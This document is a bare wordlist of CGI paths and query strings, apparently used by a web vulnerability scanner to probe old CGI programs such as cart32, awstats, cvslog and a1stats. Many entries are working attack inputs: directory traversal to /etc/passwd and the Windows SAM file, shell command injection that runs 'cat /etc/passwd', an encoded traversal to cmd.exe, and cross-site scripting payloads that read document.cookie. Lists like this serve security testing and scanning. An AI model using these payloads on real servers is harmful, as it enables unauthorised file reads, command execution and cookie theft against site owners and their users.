cgi-bin/cart32.exe
cgi-bin/classified.cgi
cgi-bin/download.cgi
cgi-bin/flexform.cgi
cgi-bin/flexform
cgi-bin/lwgate.cgi
cgi-bin/LWGate.cgi
cgi-bin/lwgate
cgi-bin/LWGate
cgi-bin/perlshop.cgi
cgi-bin/AT-admin.cgi
cgi-bin/auth_data/auth_user_file.txt
cgi-bin/awstats.pl
cgi-bin/awstats/awstats.pl
cgi-bin/blog/mt.cfg
cgi-bin/cart.pl?db='
cgi-bin/cart.pl?db='
cgi-bin/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
cgi-bin/mt-static/mt-check.cgi
cgi-bin/mt/mt-check.cgi
cgi-bin/gH.cgi
cgi-bin/gm-cplog.cgi
cgi-bin/visadmin.exe
cgi-bin/html2chtml.cgi
cgi-bin/html2wml.cgi
cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00
cgi-bin/echo.bat?&dir+c:\
cgi-bin/excite;IFS=\"$\";/bin/cat
cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
cgi-bin/guestbook.cgi
cgi-bin/guestbook.pl
cgi-bin/ss
cgi-bin/showuser.cgi
cgi-bin/man2html
cgi-bin/../../../../../../../../../../WINNT/system32/ipconfig.exe
cgi-bin/NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
cgi-bin/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
cgi-bin/rwcgi60
cgi-bin/rwcgi60/showenv
cgi-bin/index.pl
cgi-bin/index.pl
cgi-bin/classifieds/classifieds.cgi
cgi-bin/calendar/index.cgi
cgi-bin/index.pl
cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html
cgi-bin/ion-p.exe?page=c:\winnt\repair\sam
cgi-bin/ion-p?page=../../../../../etc/passwd
cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
cgi-bin/eshop.pl/seite=;cat%20eshop.pl|
cgi-bin/shop.pl/page=;cat%20shop.pl|
cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
cgi-bin/.nsconfig
cgi-bin/namazu.cgi
cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
cgi-bin/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
cgi-bin/cvslog.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
cgi-bin/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
cgi-bin/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
cgi-bin/testcgi.exe?<script>alert(document.cookie)</script>
cgi-bin/environ.pl?param1=<script>alert(document.cookie)</script>